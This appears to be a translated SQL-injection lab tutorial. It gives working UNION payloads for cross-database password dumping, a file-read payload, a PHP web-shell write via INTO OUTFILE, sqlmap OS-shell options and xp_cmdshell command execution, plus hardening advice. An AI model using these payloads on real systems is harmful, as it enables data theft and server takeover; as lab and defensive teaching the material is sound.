One, cross-database injection
For example, two sites A and B are hosted on the same server (same IP) and share one MySQL instance. If site A has an injection point and its database connection runs with high privileges (root), the injection can be used to read the data of site B, or of any other web application stored in the same database server.
Local site A: http://sqli-labs-master:100/Less-1/ , connected to the database as root
Local site B: http://127.0.0.1/xinyuan/index.php , connected to the database as an ordinary user
First, inject manually on site A to check which database account the application is using:
id=-1' union select 1,2,user() --+
user() returns the connecting account; here it is root.
Next, list all databases:
-1' union select 1,group_concat(SCHEMA_NAME),3 from information_schema.schemata--+
Among them is php_wish, the database of site B, along with the databases of other sites. The schema_name column of information_schema.schemata holds the names of all databases on the server, which is why a root connection sees every one of them.
Then get all table names in site B's database:
-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='php_wish'--+
There is only one table, wish.
Then get all column names of the wish table:
-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='wish' and table_schema='php_wish'--+
Finally, dump the data:
-1' union select 1,id,password from php_wish.wish--+
Note the cross-database detail here: the table must be qualified with its database name (php_wish.wish). The current database of site A's connection is security, and an unqualified table name is resolved in the current database, so select ... from wish would look for security.wish and fail.
That was manual injection. What is different when using a tool such as sqlmap? If the target has a high-privilege injection, options such as --tables by default first enumerate all databases the account can see and then their table names. How does the tool decide that the account is high-privilege? Each DBMS has its own built-in functions and system tables for this, and sqlmap wraps them in --is-dba, which reports whether the current user has DBA rights.
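As an added example (not part of the original write-up), the statements below are what the UNION payloads above resolve to on the MySQL server, written as stand-alone queries so they can be run directly in a client, plus the privilege checks that decide whether this chain works at all. The database names security and php_wish and the table wish are taken from the write-up; the privilege queries assume a MySQL 5.x/8.x server.

```sql
-- Added example: the server-side view of the high-privilege enumeration chain.
-- Run as the account the web application connects with.

-- Step 0: who is the application connecting as, and is it effectively a DBA?
SELECT user(), current_user();
-- A root-like account shows global privileges here (e.g. SUPER, FILE);
-- a properly scoped web account shows only per-schema grants.
SHOW GRANTS FOR CURRENT_USER();
-- Roughly the lookup sqlmap's --is-dba performs on MySQL (my paraphrase of
-- its queries.xml entry): does mysql.user mark this user as SUPER?
SELECT (SELECT super_priv FROM mysql.user
         WHERE user = SUBSTRING_INDEX(current_user(), '@', 1) LIMIT 1) = 'Y' AS is_dba;

-- Step 1: every database the account can see (payload: ... from information_schema.schemata)
SELECT group_concat(schema_name) FROM information_schema.schemata;

-- Step 2: tables of site B's database
SELECT group_concat(table_name)
  FROM information_schema.tables
 WHERE table_schema = 'php_wish';

-- Step 3: columns of the target table, scoped to the right schema
SELECT group_concat(column_name)
  FROM information_schema.columns
 WHERE table_schema = 'php_wish' AND table_name = 'wish';

-- Step 4: the data. Site A's connection has `security` as its current database,
-- so the table must be qualified; the unqualified form fails with
-- ERROR 1146 (42S02): Table 'security.wish' doesn't exist
USE security;
SELECT id, password FROM php_wish.wish;   -- works (cross-database read)
-- SELECT id, password FROM wish;         -- fails: resolved as security.wish

-- Defensive check: which accounts can read schemas other than their own?
-- Anything global (table_schema absent) or outside the app's schema is a finding.
SELECT grantee, table_schema, privilege_type
  FROM information_schema.schema_privileges
 WHERE table_schema <> 'php_wish'
 ORDER BY grantee;
```

The fix implied by the enumeration is least privilege: each application gets its own account with grants limited to its own schema, so information_schema (which only shows objects the account has some privilege on) stops revealing the other sites.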
Two, file read and write
With high privileges you can also read and write files on the database server: fetch sensitive files, or write a one-line web shell.
Read a file:
1' union select 1,load_file('d:/test.txt'),3--+
Write a one-line web shell:
id=-1' union select 1,'<?php eval($_POST[cmd]);?>',3 into outfile 'D:/phpstudy_pro/WWW/xinyuan/x.php' --+
The write only helps if it lands inside the web root, so the web application's path has to be found first: a phpinfo page, error messages that disclose absolute paths, leaked source code, the middleware (web server) configuration files read via load_file, or brute-forcing common install paths.
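As an added example, not from the original post, the statements below show the two preconditions that decide whether load_file() and INTO OUTFILE work (the FILE privilege and the secure_file_priv setting), the plain form of the payloads, and the hardening that removes the capability. The file paths are the ones from the write-up; the webapp account name and password are placeholders I introduced for illustration.

```sql
-- Added example: why the file read/write payloads succeed, and how to stop them.

-- 1. FILE is a global (server-wide) privilege; the injected account needs it.
SELECT grantee, privilege_type
  FROM information_schema.user_privileges
 WHERE privilege_type = 'FILE';

-- 2. secure_file_priv decides where the server may read from / write to:
--      NULL    -> import/export disabled entirely (load_file returns NULL,
--                 INTO OUTFILE fails with ERROR 1290)
--      ''      -> no restriction (the situation the write-up relies on)
--      <path>  -> only inside that directory
SELECT @@global.secure_file_priv;

-- 3. With FILE and an empty secure_file_priv, the payloads reduce to:
SELECT load_file('d:/test.txt');
-- load_file returns NULL (no error) if the file is missing, unreadable by the
-- mysqld service account, or larger than max_allowed_packet.
SELECT '<?php eval($_POST[cmd]);?>'
  INTO OUTFILE 'D:/phpstudy_pro/WWW/xinyuan/x.php';
-- INTO OUTFILE refuses to overwrite an existing file, and the mysqld service
-- account (not the web server's) needs write access to the target directory.
-- Forward slashes are accepted on Windows.

-- 4. Hardening: a least-privilege application account, no FILE/SUPER,
--    confined to its own schema (account details are placeholders).
CREATE USER 'webapp'@'localhost' IDENTIFIED BY 'change-me';
GRANT SELECT, INSERT, UPDATE, DELETE ON php_wish.* TO 'webapp'@'localhost';
-- and in my.cnf / my.ini, which disables file import/export server-wide:
--   [mysqld]
--   secure_file_priv = NULL
```

Checking @@secure_file_priv is also the first thing to do during a test: if it is NULL, there is no point spending requests on load_file or outfile payloads.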
Three, injection privileges and command execution
Here we use the SQL Server target on the Mozhe range and compare two GUI tools, Pangolin and Havij, on two points:
1. How they operate against SQL Server compared with other databases.
2. How the tool automatically identifies the attack and offers the matching operations.
The following operations are then available; we pick only a few.
Havij's operation interface is shown below.
Different databases expose different operations. Now let us look at the corresponding sqlmap options:
--current-user   retrieve the current database user
--file-read      read a file from the database server's file system
--file-write     write a local file to the server; --file-dest gives the remote path to write to
--sql-shell      interactive SQL shell
--os-shell       interactive operating-system shell
Following up on the server, we can see the two stager files that --os-shell uploaded, tmpbvizc.php and tmpucvgu.php.
The remaining functions are listed below; we do not run them here:
--os-cmd=OSCMD   execute a single operating-system command (e.g. --os-cmd=ver)
--os-shell       spawn an interactive OS shell
--os-pwn         out-of-band shell, Meterpreter or VNC (via Metasploit)
--os-smbrelay    one-click prompt for an out-of-band shell, Meterpreter or VNC via SMB relay
--os-bof         stored procedure buffer overflow exploitation
--priv-esc       privilege escalation of the database process user
--reg-read / --reg-add / --reg-del   read, add or delete Windows registry keys, with --reg-key, --reg-value, --reg-data and --reg-type giving the key path, value name, data and type
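As an added example, not from the original post, the T-SQL below is what the tools' privilege check and command execution come down to on Microsoft SQL Server: the sysadmin check behind --is-dba, the xp_cmdshell enablement that --os-cmd and --os-shell depend on, and the checks a defender runs afterwards. It assumes a SQL Server 2005 or later instance and is meant to be run as the injected login.

```sql
-- Added example: what --is-dba and --os-cmd/--os-shell automate on SQL Server.

-- Privilege check (the check --is-dba performs on MSSQL): 1 = member of sysadmin
SELECT IS_SRVROLEMEMBER('sysadmin') AS is_dba, SYSTEM_USER AS login_name;

-- xp_cmdshell is disabled by default. Turning it on needs ALTER SETTINGS,
-- i.e. sysadmin, which is why command execution requires a high-privilege injection.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

-- Command execution; the output returns as a result set, which the tool
-- either reads through the injection point or stages in a temporary table.
EXEC master..xp_cmdshell 'ver';

-- Defender's checks: is xp_cmdshell enabled, and which logins could enable it?
SELECT name, value_in_use
  FROM sys.configurations
 WHERE name = 'xp_cmdshell';
SELECT sp.name
  FROM sys.server_principals AS sp
 WHERE sp.type IN ('S', 'U', 'G')               -- SQL logins, Windows logins, Windows groups
   AND IS_SRVROLEMEMBER('sysadmin', sp.name) = 1;

-- Hardening: disable it again and keep the web application's login out of sysadmin.
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;
```

An application login that is not sysadmin cannot flip xp_cmdshell on, so the --os-shell path stops at the privilege check; that is the practical meaning of the page's distinction between high- and low-privilege injection.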